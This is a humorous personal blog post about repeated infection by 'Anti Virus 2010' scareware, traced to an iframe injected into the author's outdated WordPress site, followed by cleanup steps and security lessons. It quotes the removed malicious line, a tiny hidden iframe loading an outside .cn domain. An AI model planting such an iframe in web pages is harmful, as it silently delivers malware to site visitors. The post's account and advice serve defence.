Fun times with the Anti Virus 2010 Exploit

This whole experience reminds me of my all time favorite excerpt from HHGTTG:

“And there it was,” said Zaphod, “clear as day. A whole section in the middle of both brains that related only to each other and not to anything else around them. Some bastard had cauterized all the synapses and electronically traumatised those two lumps of cerebellum.”

Ford stared at him, aghast. Trillian had turned white.

“Somebody did that to you?” whispered Ford.

“Yeah.”

“But have you any idea who? Or why?”

“Why? I can only guess. But I do know who the bastard was.”

“You know? How do you know?”

“Because they left their initials burnt into the cauterized synapses. They left them there for me to see.”

Ford stared at him in horror and felt his skin begin to crawl.

“Initials? Burnt into your brain?”

“Yeah.”

“Well, what were they, for God’s sake?”

Zaphod looked at him in silence again for a moment. Then he looked away.

“Z.B.,” he said.

So yeah, I pulled a Zaphod Beeblebrox on myself.  The following is a sad tale on how one, I was stupid enough to get infected not once, not twice but three times with Anti Virus 2010!!! Two, I didn’t realize it was my own blog web site that was the culprit (Don’t worry, the exploit has been removed. Read in peace).

So what is Anti Virus 2010? av2010It’s a nasty combination of Spyware, Trojans and Malware all working together. The authors are very familiar with social engineering to get you to take steps to willingly get infected.  They basically pop up an Anti-Virus scanner and make it appear they are helping you to find a problem, and for a fee fix it.  They also take steps to remove valid spyware/virus protection and they make it darn impossible for us mere mortals to remove. I found that the Task manager was locked. So I was unable to remove or stop the offending services. My Anti Virus (AVG) was disabled. MalwareByte was disabled. Spybot Search and destroy was disabled. I tried to reboot and boot in safe mode and got a fake Blue Screen of death. All program file association was lost and I could not manually run a program from the command line. My USB Flash will all my utilities would not be recognized.  I was forced to remove the hard drive and attached to another PC via my handy dandy USB drive connector and scan the harddrive with Malewarebytes.

Re-installed my HD, booting up the PC and appears everything is clean except the damage is still left behind. MalwareBytes is disabled, along with AVG and all program file association. I could not run RegEdit to make the necessary changes, but I was alerted to use ComboFix to clean up the damage. Ran it and sure enough, I’m back in business. Well, MalwareBytes was still damaged, but I could re-install that.  So doing my victory dance jig (not a pretty sight) at this time and the initial phase of the Trojan struck! The web like scanner device was scanning my system! I uttered an expeditive that I’m not too happy about and quickly tried to activate the Task Manager. Too late, everything was locked down again.

So I had to pull the HD a second time, did a repeat of the above.  This time I made sure to run ComboFix in safe mode. I cleaned up all temp files under the profile. Rebooted normally and looks Great! I decided to make a post about this great accomplishment and Bamo! There goes the web Scanner and total lock up!

So I could cry like a little girl or do this all over again. Well, I did both. So out came the Hard drive a 3rd time, did a repeat and this time….this time I made sure I re-installed MalWarebytes and performed a total scan before any dancing or celebreating high fives. And sure enough, it did find the lone strangler. I wish I recorded where it hung out, but by this time I was too lazy to do so. I finally had my system clean and back to normal.

I wish the story ended there, but now comes the complicated part. I have verified at this point the IE is free of any infections. MalwareBytes and AVG are completely updated and scans are showing no problem. Great! This is the perfect time to blog about this nightmare, so I head on over to my blog  and AVG tells me the web site is not safe! And before I know it, the web scanner is kicking off! But this time I was able to intercept the process and kill it. AVG was able to terminate the threat as well. But needless to say, it left me speechless. The only thing I run on my web site is Word Press, which basically builds all the blog pages. Googled Ifram Exploits with Word Press and there it was. I had made the mistake of not keeping the version of Word Press updated, as known exploits where running rampant with old versions. So I was able to inspect the index page, remove the following:

<iframe src=”http://usaforwarding.cn/“; width=”3″ height=”2”></iframe>

 If you have Word Press and not sure how to inspect your HTML, then the following utility can help inspect your pages and let you know if the pages have been exploited.

So now my site is exploit free and running the latest update to WordPress (V 2.8.5)

How did I get infected in the first place? At the PC level,  I did something stupid which I tell people never to do. I disabled and closed down AVG while I was trouble shooting a Video card driver issue. Not being able to Play COD makes us do foolish things at times I admit. I then went fishing for MOBO drivers for a friend’s PC and went off the beaten path. So at first, I wasn’t sure when or where the infection started, but I did what any self respected IT person would do, I yelled at my son for infecting my PC.

Where did I get infected? I found out the hard way that my web site index.html page had been victum to an Iframe Exploit. So I owe my son an apology and anyone else that reads my blog…which including my mom makes two people.

If I paid for Anti Virus 2010 can I get my money back? Very unlikely as the whole scheme is to get your CC and perform some identify theft. So if you gave up your CC account, you best report your card is in the wild.

Lessons Learned:

  1. If you’re going to go off the Interwebs beaten paths, then never use IE (Internet Exploder). Use FireFox with the No Scripts Plugin.
  2. Never turn off the Anti-Virus protection to increase system performance.
  3. Make sure you keep Windows updated with the latest security updates.
  4. Make sure MalwareBytes stays updated. Buy the thing, it’s worth it even if it’s free.
  5. Never EVER agree to run scans or click OK if you did not launch the application.
  6. Create an actual day to day user Account that does not have Administrator permissions. For home users, Windows allows us all to be Administrators which is a big mistake. When we pick up an infections, we then basically hand the keys of the city to the troublemaker. If I had used a limited account, I may still have gotten infected, but the damaged would have been minimal.
  7. Before diving into Regedit and causing more harm then good, download and run ComboFix.
  8. Make sure you do the bulk of the scanning in Safe Mode.
  9. If you host a Word Press blog, don’t let your Word Press version go to far without apply updates. The Exploit starts there.

Special thanks to the Jasons and Ramzi for helping me get through this mess and keeping my sanity.

Leave a Reply

Your email address will not be published. Required fields are marked *

Bad Behavior has blocked 213 access attempts in the last 7 days.